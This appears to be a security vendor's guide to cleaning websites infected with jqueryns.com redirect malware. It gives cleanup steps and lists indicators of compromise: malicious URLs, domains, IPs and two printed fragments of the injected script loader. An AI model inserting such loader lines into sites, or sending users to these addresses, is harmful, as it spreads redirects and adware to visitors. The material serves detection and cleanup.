How to Clean jQueryNS.com Malware

By Adrian StoianGuides

According to PublicWWW, there are approx. 2000 sites affected by this type of malware. Which means many more web users are getting redirected to bogus sites & have their browsers infected with adware. In this article we will address the website-related stuff.

What should you do if your website is affected by jqueryns.com malware:

MAGEFIX SecurityMalware cleanup & protection

Try our Free site check.

  1. Take your website offline: The first thing you should do is take your website offline to prevent further damage. This will give you time to assess the damage and make necessary changes. If you have hosting access, you can disable public access by renaming the public HTML folder;
  2. Check other neighboring websites & perform a backup for each one;
  3. Clean the sites manually, one by one, or purchase a cleanup plan;
  4. If you’re using shared hosting and have more than 2 sites, consider better hosting to prevent cross-site contamination;
  5. Update all software and plugins: Ensure that all software and plugins on your website are up to date. Outdated software can have vulnerabilities that hackers can exploit;
  6. Monitor the sites to look for any unusual behavior;

The best way to deal with a website hack is to prevent it from happening in the first place. Regularly update your site’s plugins, themes & core files, use strong passwords, and implement security measures to keep your website safe.

Malicious code
khutmhpx.src = “https://jqueryns.com/1Z16nnks”;
khutmhpx.src = “https://jqueryns.com/HWhxCkvx”;

Other malicious URLs:
https://prizeforall.life/?u=hdnkaeq&o=lq6pghw&m=1
https://drilledgas.org/1WVsrZ4h
https://greedyfines.org/XRwKyL2h
https://deeptrickday.org/fMYD7fFx
https://neworderspath.org/k4WP6NP9
https://greenpapers.org/6gjyRhhQ
https://quaryget.org/Gb7XTy3b
https://devqeury.org/XdQJSbwV
https://devcodejs.org/kvJ7MGwc
https://jqueryns.com/4QxWgpwB
https://jsqur.com/97rmMy8V
https://jqueryh.org/Sm1y1jjF
https://devqeury.org/VjCTRDTQ
https://jqscr.com/GPfymwFy
https://my-greatbonushere.life/?u=4dkpaew&o=81yk607&cid=20gauih54lmg5
https://rewardgains.life/?u=rn2pd01&o=90lh731&cid=13tpil12fdobl
https://greatbonushere.life/?u=4dkpaew&o=81yk607&cid=11auacq1u8cfn
https://play.google.com/store/apps/details?id=com.tinder
https://appcloudactive.com/away.php
https://waterlinesheet.org/bDrVdw9c
https://lemonicecold.org/BTygcdHd
https://keep-rewards.life/?u=gqnpae3

Malicious domains: drilledgas.org, backendjs.org, jqscr.com, getquery.org, devcodejs.org, backendjs.org, jqscr.com, jqueryh.org, jqueryj.com, jsviewdev.org, devqeury.org.
keep-rewards.life, my-greatbonushere.life, greatbonushere.life, giftbonus.life, getbigbonuses.life, bestergirls.com, rewardgains.life, bonusreward.life, appcloudactive.com, 1817.dadjaneelse.live.


Malicious IPs: 185.155.184.138, 91.103.253.14, 91.203.193.124, 146.59.240.191, 91.142.77.51, 47.90.178.252, 185.155.184.98, 135.125.135.44.
ASNs: AS16276

Need more help?

Try our Free site check.